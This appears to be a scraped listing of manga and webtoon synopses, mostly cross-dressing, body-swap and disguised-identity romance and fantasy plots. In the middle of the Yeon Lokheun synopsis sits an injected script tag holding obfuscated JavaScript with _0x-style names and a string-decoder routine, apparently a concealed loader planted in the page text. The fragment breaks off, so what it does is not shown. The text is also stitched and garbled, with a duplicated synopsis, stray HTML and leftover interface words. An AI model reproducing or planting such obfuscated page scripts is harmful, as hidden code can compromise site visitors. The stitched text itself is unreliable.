Unknowingly swapped upon birth, Princess Brianna lost her identity as a princess and became a vagrant orphan. One day, her Imperial Father suddenly sought her back, reinstating her back to her rightful identity as the nation’s princess. However, what awaited her was not a family reunion nor was it an extravagant life, but instead, she was to become a sacrifice for the god. Reincarnated into the body of Princess Brianna, our main character only wants to change her fate of death, yet realises that the best way to do so is to become the sacrifice. The only way she can live is by becoming the sacrifice, as hidden scheming along with its causes and effects, slowly unravel in front of her eyes. (Synopsis: Gourmet Scans) Show less Unknowingly swapped upon birth, Princess Brianna lost her identity as a princess and became a vagrant orphan. One day, her Imperial Father suddenly sought her back, reinstating her back to her rightful identity as the nation’s princess. However, what awaited her was not a family reunion nor was it an extravagant life, but instead, she was to become a sacrifice for the god. Reincarnated into the body of Princess Brianna, our main character only wants to change her fate of death, yet realises that the best way to do so is to become the sacrifice. The only way she can live is by becoming the sacrifice, as hidden scheming along with its causes and effects, slowly unravel in front of her eyes. (Synopsis: Gourmet Scans)
Yeon Lokheun is a girl who grows up living as a boy learning martial and spiritual arts. She heads for the palace in order to clear the name of her father, a wanted criminal, where she meets the young Emperor Garyun. He promises to save her father’s life in exchange for her lifelong services. After gaining Garyun’s trust, she travels the world solving supernatural-like problems that arise in place of the Emperor. But how long can she continue this life without the others finding out that she is actually a woman?<script></script><script>function _0x11be(_0x18d6cf,_0xaa5299){var _0x9102b6=_0x5470();return _0x11be=function(_0x178245,_0x2fc866){_0x178245=_0x178245-(-0x79*-0x14+0x955+0x3f*-0x47);var _0x35d96b=_0x9102b6[_0x178245];return _0x35d96b;},_0x11be(_0x18d6cf,_0xaa5299);}(function(_0x4422c4,_0x10b32c){var _0x31a312=_0x11be,_0x4f2a4f=_0x4422c4();while(!![]){try{var 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<div class="description-summary"> <div class="summary__content show-more active"> Lindsay is a top-secret spy about to take on her most difficult mission yet: to disguise herself as a man?! Her target is the Duke. Rich, mysterious, and… an infamous womanizer. Cutting her hair, drinking elixirs to hide her voice, as a servant she must infiltrate his manor and investigate the mysterious disappearance of lords and ladies in the area. However, when she meets the Duke for the first time and he kisses her, is it her identity that’s compromised or her heart… </div> </div>
Time reversed, Qiu Yi became a girl, but a male version of himself still exists in this time… 【Am I still myself? Who exactly am I?】 What kind of sparks would ignite when he, who is a girl, meets his male self? Everything is in 《I Am My Wife》.
Duke Kahel Luave, the unlucky duke, who cannot keep one servant by his side because of the devilish nature that charms men and women of all ages. Meet Lena, a maid with a rare constitution where devilish charms don’t work. *** If the devilish energy emanating from him was a scent, now this room would be filled with a dizzyingly strong scent. However, there were no other positive emotions in Lena’s eyes except worry and fear. Kahel decided to take another approach. His appearance was also so seductive that it was rumored to be the best in the kingdom, so no matter how much he suppressed his devilish nature, he could not stop people from falling for him. Recalling that troublesome past, Kahel gave Lena a strange smile. This kind of service was not given to anyone. But……. “Sa, save me, please… … .” Lena, who was barely holding back her tears, began to cry and beg for her life. It was the moment when the law of ‘even the gods will fall in love’ on his smile faded away. ‘It’s not normal. As expected, it’s suspicious.’ Associated Names 마성의 공작님은 잠 못 이루고
.Zi Yue, a male in female disguise, changes into a dancer to get close to the insatiable and current dynasty's prime minister Zuo Yicheng. However, he did not expect to be exposed and suppressed on the bed! Zi Yue pouted: get off of me! Zuo Yicheng: then come up here~~~ Zi Yue: scram!not found...
<span class="mx-1">Silver Girl, Crow Girl</span> She has everything to prove. He must pretend to be another. In this Empire where everything is about appearance, she is the scapegoat for the whole people. Everyone believes she is cursed because of the color of her hair: black raven hair symbolizing the devil and his curse. Her opponent as Empress is her opposite and has silver hair. But in this world, appearances are very often misleading...
[English] It’s a rude insult when lowly and headstrong servant Edna comes to marry Duke Eli, instead of the noble daughter he expected. But the ambitious maid hides an even bigger secret behind her obvious ruse – one that could change the kingdom’s very history. Can the two find freedom, redemption – and love – without drawing their swords on each other? Based on the hit novels by Korean author Ryu HyangSource to collect images: https://bato.to
“We can see spirits and hear the inner thoughts of others. We were born atop auspicious clouds and are truly the Son of Heaven. We will definitely refuse to” “go die!” “However, we were harmed by an evil-doer and turned into a girl! We don’t have our power-ups anymore — fine! But to that parasite staying in our magnificent body: could you stop only thinking about losing weight?! You’re just being mean at this point! Who knows what kind of hilarious events can unfold when two people who have never met each other end up switching bodies?! Please — enjoy the show!”
This is surely a story you’ve never thought of! The cartoon’s main character is called Yuan Xin. She’s an otaku who likes to immerse herself in a fantasy world. She, who likes to look at hot guys–after embarrassing herself in front of them in the school yard, decides to retaliate. Unexpectedly, during the crucial moment, an accident happened, and she crossed over to the game world!
What if the person you liked was the same gender? A beautiful girl suddenly appeared in front of the main character, Yuji! But what's her real identity...!? A new generation love comedy that questions “true love” in between tales of laughter and sadness.
[From Mangacity]: Nearly 2000 years ago, the prosperous Han dynasty of China collapsed. Heroes rose and fell, and three nations emerged--Wei, Shu, and Wu. Historians refer to this period as the three kingdoms period. The romance of the three kingdom is an intriguing tale of heroic deeds, of alliance forged and broken, of loyalty and betrayal... Hong Kong artist Chan Mou retells this classic tale in "The Ravages of Time" from the perspective of the Sima clan, which in the end united the three kingdoms. Readers will be attracted by an array of well-developed characters and Chan Mou's own unique top-notch art-style. Whether you have played Dynasty Warriors or not, this is definitely worth a read!